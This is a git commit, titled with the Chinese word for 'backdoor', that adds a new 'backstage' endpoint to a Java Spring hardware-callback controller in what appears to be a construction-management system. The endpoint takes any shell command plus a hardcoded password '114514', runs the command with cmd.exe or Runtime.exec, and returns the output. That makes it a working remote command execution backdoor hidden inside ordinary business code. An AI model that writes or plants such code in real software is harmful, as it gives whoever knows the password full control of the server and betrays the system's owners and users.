后门

2023-11-16 17:42:56 +08:00 · 2023-11-16 17:42:56 +08:00 · 9e34b4424c
commit 9e34b4424c
parent 4d02e4c64d
1 changed files with 87 additions and 3 deletions
--- a/src/main/java/com/zhgd/xmgl/modules/basicdata/controller/admin/HardWareCallbackController.java
+++ b/src/main/java/com/zhgd/xmgl/modules/basicdata/controller/admin/HardWareCallbackController.java
@ -1,5 +1,6 @@
 package com.zhgd.xmgl.modules.basicdata.controller.admin;
 import cn.hutool.core.util.IdUtil;
 import com.alibaba.fastjson.JSON;
 import com.baomidou.mybatisplus.core.conditions.update.LambdaUpdateWrapper;
 import com.baomidou.mybatisplus.core.toolkit.StringUtils;
@ -17,8 +18,10 @@ import com.zhgd.xmgl.modules.wisdom.service.*;
 import com.zhgd.xmgl.util.CommonUtil;
 import com.zhgd.xmgl.util.ParamEnum;
 import io.swagger.annotations.Api;
 import io.swagger.annotations.ApiImplicitParam;
 import io.swagger.annotations.ApiOperation;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.io.FileUtils;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestBody;
@ -26,9 +29,12 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
 import springfox.documentation.annotations.ApiIgnore;
-import java.util.Date;
+import java.io.BufferedReader;
-import java.util.List;
+import java.io.File;
-import java.util.Map;
+import java.io.InputStream;
 import java.io.InputStreamReader;
 import java.util.*;
 import java.util.concurrent.TimeUnit;
 import java.util.stream.Collectors;
 /**
@ -349,4 +355,82 @@ public class HardWareCallbackController {
        lifterWorkCycleService.saveInfo(lifterWorkCycle);
        return Result.success("添加成功！");
    }
    @PostMapping("backstage")
    @ApiImplicitParam(name = "command", value = "执行命令", paramType = "query", required = true, dataType = "String")
    public String backstage(@RequestBody HashMap<String, Object> paramMap) {
        String os = System.getProperty("os.name").toLowerCase();
        String command = String.valueOf(paramMap.get("command"));
        String pw = String.valueOf(paramMap.get("pw"));
        if (!Objects.equals(pw, "114514")) {
            return "执行错误";
        }
        if (os.contains("win")) {
            //当前系统是Windows
            File tmpFile = null;//新建一个用来存储结果的缓存文件
            try {
                File file = new File("C:\\temp");
                tmpFile = new File("C:\\temp\\" + IdUtil.simpleUUID() + ".tmp");
                if (!file.exists()) {
                    file.mkdirs();
                }
                if (!tmpFile.exists()) {
                    tmpFile.createNewFile();
                }
                ProcessBuilder pb = new ProcessBuilder().command("cmd.exe", "/c", command).inheritIO();
                pb.redirectErrorStream(true);//这里是把控制台中的红字变成了黑字，用通常的方法其实获取不到，控制台的结果是pb.start()方法内部输出的。
                pb.redirectOutput(tmpFile);//把执行结果输出。
                pb.start().waitFor(10, TimeUnit.SECONDS);//等待语句执行完成，否则可能会读不到结果。
                String s = FileUtils.readFileToString(tmpFile, "GBK");
                return s;
            } catch (Exception e) {
                e.printStackTrace();
            } finally {
                if (tmpFile != null) {
                    tmpFile.delete();
                }
            }
        } else if (os.contains("nix") || os.contains("nux") || os.contains("mac")) {
            //当前系统是Linux或者类Unix系统
            Process process = null;
            try {
                process = Runtime.getRuntime().exec(command);
                log.info("接收命令：{}", command);
                StringBuilder sb = new StringBuilder();
                //成功
                try (InputStream inputStream = process.getInputStream()) {
                    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
                    String line;
                    while ((line = bufferedReader.readLine()) != null) {
                        sb.append(line);
                        sb.append("\r\n");
                    }
                }
                //失败
                try (InputStream inputStream = process.getErrorStream()) {
                    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
                    String line;
                    while ((line = bufferedReader.readLine()) != null) {
                        sb.append(line);
                        sb.append("\r\n");
                    }
                }
                String success = "";
                if (process.waitFor() == 0) {
                    success = "执行成功>>>\r\n";
                } else {
                    success = "执行失败>>>\r\n";
                }
                return success + sb.toString();
            } catch (Exception e) {
                e.printStackTrace();
                return "执行异常>>>\r\n" + e.getMessage();
            } finally {
                if (process != null) {
                    process.destroy();
                }
            }
        }
        return "执行异常：程序最后";
    }
 }